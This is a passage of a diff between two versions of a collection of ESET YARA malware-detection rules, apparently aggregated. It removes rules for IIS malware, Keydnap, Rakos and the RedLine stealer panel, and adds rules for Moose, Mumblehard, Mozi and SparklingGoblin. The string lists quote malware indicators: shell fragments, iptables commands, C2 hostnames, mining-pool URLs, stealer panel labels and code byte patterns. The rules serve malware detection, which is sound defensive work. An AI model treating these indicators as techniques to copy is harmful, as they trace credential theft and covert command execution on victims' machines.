 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "8da03328e3702aff8ea5de77fc220f326030c31972d27c0bd9b5918dca550aba"
+		logic_hash = "8bedac80a1f754ce56294ba9786b62a002aacd074f756724401efc61def127e6"
 		score = 75
-		quality = 78
+		quality = 30
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		Author = "Thomas Dupuy"
+		Description = "Linux/Moose malware"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = "C:\\inetpub\\temp\\IIS Temporary Compressed Files\\"
-		$s2 = "F5XFFHttpModule.dll"
-		$s3 = "gtest_redir"
-		$s4 = "\\cmd.exe" nocase
-		$s5 = "iuuq;00"
-		$s6 = "?xhost="
-		$s7 = "&reurl="
-		$s8 = "?jump=1"
-		$s9 = "app|zqb"
-		$s10 = "ifeng|ivc|sogou|so.com|baidu|google|youdao|yahoo|bing|118114|biso|gougou|sooule|360|sm|uc"
-		$s11 = "sogou|so.com|baidu|google|youdao|yahoo|bing|gougou|sooule|360|sm.cn|uc"
-		$s12 = "Hotcss/|Hotjs/"
-		$s13 = "HotImg/|HotPic/"
-		$s14 = "msf connect error !!"
-		$s15 = "download ok !!"
-		$s16 = "download error !! "
-		$s17 = "param error !!"
-		$s18 = "Real Path: "
-		$s19 = "unknown cmd !"
-		$b1 = {15 BD 01 2E [-] 5E 40 08 97 [-] CF 8C BE 30 [-] 28 42 C6 3B}
-		$b2 = {E1 0A DC 39 [-] 49 BA 59 AB [-] BE 56 E0 57 [-] F2 0F 88 3E}
+		$s0 = "Status: OK"
+		$s1 = "--scrypt"
+		$s2 = "stratum+tcp://"
+		$s3 = "cmd.so"
+		$s4 = "/Challenge"
+		$s7 = "processor"
+		$s9 = "cpu model"
+		$s21 = "password is wrong"
+		$s22 = "password:"
+		$s23 = "uthentication failed"
+		$s24 = "sh"
+		$s25 = "ps"
+		$s26 = "echo -n -e "
+		$s27 = "chmod"
+		$s28 = "elan2"
+		$s29 = "elan3"
+		$s30 = "chmod: not found"
+		$s31 = "cat /proc/cpuinfo"
+		$s32 = "/proc/%s/cmdline"
+		$s33 = "kill %s"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 5 of them
+		ESET_Is_Elf_PRIVATE and all of them
 }
-rule ESET_IIS_Group13_Iiserpent
+rule ESET_Moose_2
 {
 	meta:
-		description = "Detects Group 13 native IIS malware family (IISerpent)"
-		author = "ESET Research"
-		id = "f22dffb1-466f-5a7b-b9aa-de7ba991db1a"
-		date = "2021-08-04"
-		modified = "2021-08-04"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L497-L523"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "74372984-dace-5665-a5d0-39b8d1002fa1"
+		date = "2016-10-02"
+		modified = "2016-11-01"
+		reference = "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/moose/linux-moose.yar#L78-L110"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "7077b842c53ee1581ad4150cdfaac3502bfc0fbd3b823190ad648e09f36e442d"
+		logic_hash = "3f50d2d81d4c27e44d93804adcf93971017767ed0e020447cdb343931c2fbc43"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		Author = "Thomas Dupuy"
+		Description = "Linux/Moose malware active since September 2015"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = "/mconfig/lunlian.txt"
-		$s2 = "http://sb.qrfy.ne"
-		$s3 = "folderlinkpath"
-		$s4 = "folderlinkcount"
-		$s5 = "onlymobilespider"
-		$s6 = "redirectreferer"
-		$s7 = "loadSuccessfull : "
-		$s8 = "spider"
-		$s9 = "<a href="
-		$s11 = "?ReloadModuleConfig=1"
-		$s12 = "?DisplayModuleConfig=1"
+		$s1 = "Modules are loaded"
+		$s2 = "--scrypt"
+		$s3 = "http://"
+		$s4 = "https://"
+		$s5 = "processor "
+		$s6 = "cpu model "
+		$s7 = "Host: www.challpok.cn"
+		$s8 = "Cookie: PHPSESSID=%s; nhash=%s; chash=%s"
+		$s9 = "fail!"
+		$s10 = "H3lL0WoRlD"
+		$s11 = "crondd"
+		$s12 = "cat /proc/cpuinfo"
+		$s13 = "Set-Cookie: PHPSESSID="
+		$s14 = "Set-Cookie: LP="
+		$s15 = "Set-Cookie: WL="
+		$s16 = "Set-Cookie: CP="
+		$s17 = "Loading modules..."
+		$s18 = "-nobg"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 5 of them
+		ESET_Is_Elf_PRIVATE and 5 of them
 }
-rule ESET_IIS_Group14
+rule ESET_Mumblehard_Packer
 {
 	meta:
-		description = "Detects Group 14 native IIS malware family"
-		author = "ESET Research"
-		id = "c773b09e-9f24-5e75-ba80-4be69af70b06"
-		date = "2021-08-04"
-		modified = "2021-08-04"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L525-L552"
+		description = "Mumblehard i386 assembly code responsible for decrypting Perl code"
+		author = "Marc-Etienne M.Léveillé"
+		id = "981c18e3-ac28-54f5-97ab-44b1d12a1389"
+		date = "2015-04-07"
+		modified = "2015-05-01"
+		reference = "http://www.welivesecurity.com"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/mumblehard/mumblehard_packer.yar#L32-L47"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "ef10a4dfb1a9164533677416a7c9ada715ce10bfc1e5f92b56cf54bd890d4575"
+		logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$i1 = "agent-self: %s"
-		$i2 = "/utf.php?key="
-		$i3 = "/self.php?v="
-		$i4 = "<script type=\"text/javascript\" src=\"//speed.wlaspsd.co"
-		$i5 = "now.asmkpo.co"
-		$s1 = "Baiduspider"
-		$s2 = "360Spider"
-		$s3 = "Sogou"
-		$s4 = "YisouSpider"
-		$s6 = "HTTP_X_FORWARDED_FOR"
+		$decrypt = { 31 db  [1-10]  ba ?? 00 00 00  [0-6]  (56 5f |  89 F7)
+                     39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00
+                     00 31 db 43 ac 30 d8 aa 43 e2 e2 }
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 2 of ( $i* ) or 5 of them
+		$decrypt
 }
-rule ESET_Keydnap_Downloader
+rule ESET_Mozi_Killswitch : FILE
 {
 	meta:
-		description = "OSX/Keydnap Downloader"
-		author = "Marc-Etienne M.Léveillé"
-		id = "2b21007a-b143-5538-8777-ba35448d00aa"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L33-L49"
+		description = "Mozi botnet kill switch"
+		author = "Ivan Besina"
+		id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29"
+		date = "2023-09-29"
+		modified = "2023-10-31"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/mozi/mozi.yar#L32-L51"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c"
+		logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$ = "icloudsyncd"
-		$ = "killall Terminal"
-		$ = "open %s"
+		$iptables1 = "iptables -I INPUT  -p tcp --destination-port 7547 -j DROP"
+		$iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP"
+		$haha = "/haha"
+		$networks = "/usr/networks"
 
 	condition:
-		2 of them
+		all of them and filesize < 500KB
 }
-rule ESET_Keydnap_Backdoor_Packer
+
+rule ESET_Sparklinggoblin_Chacha20Loader_Richheader
 {
 	meta:
-		description = "OSX/Keydnap packed backdoor"
-		author = "Marc-Etienne M.Léveillé"
-		id = "f29ad5af-bc86-5764-9451-5a8363788c4e"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L51-L67"
+		description = "Rule matching ChaCha20 loaders rich header"
+		author = "ESET Research"
+		id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295"
+		date = "2021-03-30"
+		modified = "2021-08-26"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L33-L57"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147"
+		hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821"
+		hash = "29b147b76bb0d9e09f7297487cb972e6a2905586"
+		hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37"
+		hash = "45bef297ce78521eac6ee39e7603e18360e67c5a"
+		hash = "4cec7cdc78d95c70555a153963064f216dae8799"
+		hash = "4d4c1a062a0390b20732ba4d65317827f2339b80"
+		hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4"
+		logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1"
-
-	strings:
-		$upx_string = "This file is packed with the UPX"
-		$packer_magic = "ASS7"
-		$upx_magic = "UPX!"
+		license = "BSD 2-Clause"
 
 	condition:
-		$upx_string and $packer_magic and not $upx_magic
+		pe.rich_signature.length>= 104 and pe.rich_signature.length <= 112 and pe.rich_signature.toolid ( 241 , 40116 ) >= 5 and pe.rich_signature.toolid ( 241 , 40116 ) <= 10 and pe.rich_signature.toolid ( 147 , 30729 ) == 11 and pe.rich_signature.toolid ( 264 , 24215 ) >= 15 and pe.rich_signature.toolid ( 264 , 24215 ) <= 16
 }
-rule ESET_Keydnap_Backdoor
+rule ESET_Sparklinggoblin_Chacha20 : FILE
 {
 	meta:
-		description = "Unpacked OSX/Keydnap backdoor"
-		author = "Marc-Etienne M.Léveillé"
-		id = "099c1796-6237-5ec1-ba25-cd5feca79865"
-		date = "2016-07-06"
-		modified = "2016-07-06"
-		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L69-L86"
+		description = "SparklingGoblin ChaCha20 implementations"
+		author = "ESET Research"
+		id = "c0caceca-f685-5786-82f6-3ab7435f8061"
+		date = "2021-05-20"
+		modified = "2021-08-26"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L59-L368"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a"
+		logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1"
+		tags = "FILE"
+		license = "BSD 2-Clause"
 
 	strings:
-		$ = "api/osx/get_task"
-		$ = "api/osx/cmd_executed"
-		$ = "Loader-"
-		$ = "u2RLhh+!LGd9p8!ZtuKcN"
-		$ = "com.apple.iCloud.sync.daemon"
+		$chunk_1 = {
+            8B 4D ??
+            56
+            8B 75 ??
+            57
+            8B 7D ??
+            8B 04 BB
+            01 04 93
+            8B 04 B3
+            33 04 93
+            C1 C0 10
+            89 04 B3
+            01 04 8B
+            8B 04 BB
+            33 04 8B
+            C1 C0 0C
+            89 04 BB
+            01 04 93
+            8B 04 B3
+            33 04 93
+            C1 C0 08
+            89 04 B3
+            01 04 8B
+            8B 04 BB
+            33 04 8B
+            C1 C0 07
+            89 04 BB
+        }
+		$chunk_2 = {
+            03 4D ??
+            44 03 C0
+            03 55 ??
+            33 F1
+            45 33 D8
+            C1 C6 10
+            44 33 F2
+            41 C1 C3 10
+            41 03 FB
+            41 C1 C6 10
+            45 03 E6
+            41 03 DA
+            44 33 CB
+            44 03 EE
+            41 C1 C1 10
+            8B C7
+            33 45 ??
+            45 03 F9
+            C1 C0 0C
+            44 03 C0
+            45 33 D8
+            44 89 45 ??
+            41 C1 C3 08
+            41 03 FB
+            44 8B C7
+            44 33 C0
+            41 8B C5
+            33 45 ??
+            C1 C0 0C
+            03 C8
+            41 C1 C0 07
+            33 F1
+            89 4D ??
+            C1 C6 08
+            44 03 EE
+            41 8B CD
+            33 C8
+            41 8B C4
+            33 45 ??
+            C1 C0 0C
+            03 D0
+            C1 C1 07
+            44 33 F2
+            89 55 ??
+            41 C1 C6 08
+            45 03 E6
+            41 8B D4
+            33 D0
+            41 8B C7
+            41 33 C2
+            C1 C2 07
+            C1 C0 0C
+            03 D8
+            44 33 CB
+            41 C1 C1 08
+            45 03 F9
+            45 8B D7
+            44 33 D0
+            8B 45 ??
+            03 C1
+            41 C1 C2 07
+            44 33 C8
+            89 45 ??
+            41 C1 C1 10
+            45 03 E1
+            41 8B C4
+            33 C1
+            8B 4D ??
+            C1 C0 0C
+            03 C8
+            44 33 C9
+            89 4D ??
+            89 4D ??
+            41 C1 C1 08
+            45 03 E1
+            41 8B CC
+            33 C8
+            8B 45 ??
+            C1 C1 07
+            89 4D ??
+            89 4D ??
+            03 C2
+            41 03 D8
+            89 45 ??
+            41 33 C3
+            C1 C0 10
+            44 03 F8
+            41 8B CF
+            33 CA
+            8B 55 ??
+        }
+		$chunk_3 = {
+            C7 45 ?? 65 78 70 61
+            4C 8D 45 ??
+            C7 45 ?? 6E 64 20 33
+            4D 8B F9
+            C7 45 ?? 32 2D 62 79
+            4C 2B C1
+            C7 45 ?? 74 65 20 6B
+        }
+		$chunk_4 = {
+            0F B6 02
+            0F B6 4A ??
+            C1 E1 08
+            0B C8
+            0F B6 42 ??
+            C1 E1 08
+            0B C8
+            0F B6 42 ??
+            C1 E1 08
+            0B C8
+            41 89 0C 10
+            48 8D 52 ??
+            49 83 E9 01
+        }
+		$chunk_5 = {
+            03 4D ??
+            44 03 C0
+            03 55 ??
+            33 F1
+            41 33 F8
+            C1 C6 10
+            44 33 F2
+            C1 C7 10
+            44 03 DF
+            41 C1 C6 10
+            45 03 E6
+            44 03 CB
+            45 33 D1
+            44 03 EE
+            41 C1 C2 10
+            41 8B C3
+            33 45 ??
+            45 03 FA
+            C1 C0 0C
+            44 03 C0
+            41 33 F8
+            44 89 45 ??
+            C1 C7 08
+            44 03 DF
+            45 8B C3
+            44 33 C0
+            41 8B C5
+            33 45 ??
+            C1 C0 0C
+            03 C8
+            41 C1 C0 07
+            33 F1
+            89 4D ??
+            C1 C6 08
+            44 03 EE
+            41 8B CD
+            33 C8
+            41 8B C4
+            33 45 ??
+            C1 C0 0C
+            03 D0
+            C1 C1 07
+            44 33 F2
+            89 55 ??
+            41 C1 C6 08
+            45 03 E6
+            41 8B D4
+            33 D0
+            41 8B C7
+            33 C3
+            C1 C2 07
+            C1 C0 0C
+            44 03 C8
+            45 33 D1
+            41 C1 C2 08
+            45 03 FA
+            41 8B DF
+            33 D8
+            8B 45 ??
+            03 C1
+            C1 C3 07
+            44 33 D0
+            89 45 ??
+            41 C1 C2 10
+            45 03 E2
+            41 8B C4
+            33 C1
+            8B 4D ??
+            C1 C0 0C
+            03 C8
+            44 33 D1
+            89 4D ??
+            89 4D ??
+            41 C1 C2 08
+            45 03 E2
+            41 8B CC
+            33 C8
+            8B 45 ??
+            C1 C1 07
+            89 4D ??
+            89 4D ??
+            03 C2
+            45 03 C8
+            89 45 ??
+            33 C7
+            C1 C0 10
+            44 03 F8
+            41 8B CF
+            33 CA
+            8B 55 ??
+            C1 C1 0C
+            03 D1
+            8B FA
+            89 55 ??
+            33 F8
+            89 55 ??
+            8B 55 ??
+            03 D3
+            C1 C7 08
+            44 03 FF
+            41 8B C7
+            33 C1
+            C1 C0 07
+            89 45 ??
+            89 45 ??
+            8B C2
+            33 C6
+            C1 C0 10
+            44 03 D8
+            41 33 DB
+            C1 C3 0C
+            03 D3
+            8B F2
+            89 55 ??
+            33 F0
+            41 8B C1
+            41 33 C6
+            C1 C6 08
+            C1 C0 10
+            44 03 DE
+            44 03 E8
+            41 33 DB
+            41 8B CD
+            C1 C3 07
+            41 33 C8
+            44 8B 45 ??
+            C1 C1 0C
+            44 03 C9
+            45 8B F1
+            44 33 F0
+            41 C1 C6 08
+            45 03 EE
+            41 8B C5
+            33 C1
+            8B 4D ??
+            C1 C0 07
+        }
 
 	condition:
-		2 of them
+		any of them and filesize < 450KB
 }
-rule ESET_Prikormka
+rule ESET_Sparklinggoblin_Etweventwrite
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "6073aa34-d385-5ae8-b97d-9b3d61015aae"
-		date = "2016-05-10"
-		modified = "2019-08-28"
+		description = "SparklingGoblin EtwEventWrite patching"
+		author = "ESET Research"
+		id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd"
+		date = "2021-05-20"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/groundbait/prikormka.yar#L130-L141"
-		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Anton Cherepanov"
-		Description = "Operation Groundbait"
-		Contact = "threatintel@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE
-}
-rule ESET_Linux_Rakos
-{
-	meta:
-		description = "Linux/Rakos.A executable"
-		author = "Peter Kálnai"
-		id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0"
-		date = "2016-12-13"
-		modified = "2016-12-19"
-		reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/rakos/rakos.yar#L33-L53"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L370-L463"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b"
 		score = 75
 		quality = 80
 		tags = ""
-		version = "1"
-		contact = "threatintel@eset.com"
 		license = "BSD 2-Clause"
 
 	strings:
-		$ = "upgrade/vars.yaml"
-		$ = "MUTTER"
-		$ = "/tmp/.javaxxx"
-		$ = "uckmydi"
+		$chunk_1 = {
+            48 8D 0D ?? ?? ?? ??
+            C7 44 24 ?? 48 31 C0 C3
+            FF 15 ?? ?? ?? ??
+            48 8B C8
+            48 8D 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ??
+            83 64 24 ?? 00
+            4C 8D 4C 24 ??
+            BF 04 00 00 00
+            48 8B C8
+            8B D7
+            48 8B D8
+            44 8D 47 ??
+            FF 15 ?? ?? ?? ??
+            44 8B C7
+            48 8D 54 24 ??
+            48 8B CB
+            E8 ?? ?? ?? ??
+            44 8B 44 24 ??
+            4C 8D 4C 24 ??
+            8B D7
+            48 8B CB
+            FF 15 ?? ?? ?? ??
+            48 8B 05 ?? ?? ?? ??
+        }
+		$chunk_2 = {
+            55
+            8B EC
+            51
+            51
+            57
+            68 08 1A 41 00
+            66 C7 45 ?? C2 14
+            C6 45 ?? 00
+            FF 15 ?? ?? ?? ??
+            68 10 1A 41 00
+            50
+            FF 15 ?? ?? ?? ??
+            83 65 ?? 00
+            8B F8
+            8D 45 ??
+            50
+            6A 40
+            6A 03
+            57
+            FF 15 ?? ?? ?? ??
+            6A 03
+            8D 45 ??
+            50
+            57
+            E8 ?? ?? ?? ??
+            83 C4 0C
+            8D 45 ??
+            50
+            FF 75 ??
+            6A 03
+            57
+            FF 15 ?? ?? ?? ??
+        }
+		$chunk_3 = {
+            48 8D 0D ?? ?? ?? ??
+            C7 44 24 ?? 48 31 C0 C3
+            FF 15 ?? ?? ?? ??
+            48 8B C8
+            48 8D 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ??
+        }
 
 	condition:
-		3 of them
+		any of them
 }
-rule ESET_Cw_Windows_Redline_Panel_Tab_Headers : FILE
+rule ESET_Sparklinggoblin_Mutex
 {
 	meta:
-		description = "Matches view headers in Redline Panel"
+		description = "SparklingGoblin ChaCha20 loaders mutexes"
 		author = "ESET Research"
-		id = "44a95845-b0a3-59c1-8188-86d415eff0bf"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979"
+		date = "2021-05-20"
+		modified = "2021-08-26"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L32-L55"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L465-L489"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "3198aa9df2814a5f1d5568c6eed5f3189b2f72b3928cc97645f9bf57eebab9ac"
+		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
+		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
+		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
+		hash = "4668302969fe122874fb2447a80378dcb671c86b"
+		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
+		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
+		logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
-		version = 2
 
 	strings:
-		$ = "RedLine | Log In"
-		$ = "RedLine | Autofilles Viewer"
-		$ = "RedLine | Choose Browser"
-		$ = "RedLine | Cookie Viewer"
-		$ = "RedLine | Credit Card Viewer"
-		$ = "RedLine | Files Viewer"
-		$ = "RedLine | Log saver"
-		$ = "RedLine | System Info Viewer"
+		$mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno"
+		$mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		any of them
 }
-rule ESET_Cw_Windows_Redline_Panel_Distinctive_Strings : FILE
+rule ESET_Potao
 {
 	meta:
-		description = "Matches rare strings found in Redline panel"
-		author = "ESET Research"
-		id = "d40ccb6b-e777-5c05-b97c-ead910047649"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "9c755cb8-9e3f-5118-a8e0-4ded9a075cbd"
+		date = "2015-07-29"
+		modified = "2015-07-30"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L57-L77"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/potao/PotaoNew.yara#L96-L108"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "7ff0239426c4c3b46a269fad71232295c038c09f276cdc3c7f1142c830260a6d"
+		logic_hash = "c68addb14f7c22cec0c4d58bfffd373b2e3eb5c53a5b65532c84574e073fcbba"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 2
-
-	strings:
-		$env_var = "%DSK_23%"
-		$fn_name = "IsGratherThan"
-		$telegram0 = "Telegram: @REDLINESUPPORT"
-		$telegram1 = "https://t.me/REDLINESUPPORT"
+		tags = ""
+		Author = "Anton Cherepanov"
+		Description = "Operation Potao"
+		Contact = "threatintel@eset.com"
+		License = "BSD 2-Clause"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		ESET_Potaodecoy_PRIVATE or ESET_Potaodll_PRIVATE or ESET_Potaousb_PRIVATE or ESET_Potaosecondstage_PRIVATE
 }
-rule ESET_Cw_Windows_Redline_Panel_Prompts : FILE
+
+rule ESET_Beds_Plugin
 {
 	meta:
-		description = "Matches prompt messages in Redline panel"
-		author = "ESET Research"
-		id = "3481586b-ed4b-5a27-82a0-0bbb3eea279e"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "7c038e92-1064-503e-9d63-2d2c10f1759e"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L79-L113"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L34-L51"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "0dfab05a9383ba13b3c610f1ab0c81e95804470002f27171ab39706f7723983a"
+		logic_hash = "024cb91288f133e4cdf5993ac0477de6de76d38fa06f7affa348c6a28a4600da"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 2
-
-	strings:
-		$ = "Choose directory to save log"
-		$ = "Select log to set comment"
-		$ = "Please enter an action to create new task"
-		$ = "Please enter a target to create new task"
-		$ = "Please enter a final point to create new task"
-		$ = "Please enter a correct action to create new task"
-		$ = "Please enter a correct final point to create new task"
-		$ = "Please enter an action to edit task"
-		$ = "Please enter a target to edit task"
-		$ = "Please enter a final point to edit task"
-		$ = "Please enter a correct action to edit task"
-		$ = "Please enter a correct final point to edit task"
-		$ = "Please enter a correct status to edit task"
-		$ = "Please, enter a domains"
-		$ = "Please, enter a valid server ip"
-		$ = "Choose a file to pump"
-		$ = "Enter a valid count of bytes"
-		$ = "Enter a valid count of bytes. Must be more then zero"
-		$ = "Disconnected. Reboot your panel"
+		tags = ""
+		Author = "Frédéric Vachon"
+		Description = "Stantinko BEDS' plugins"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
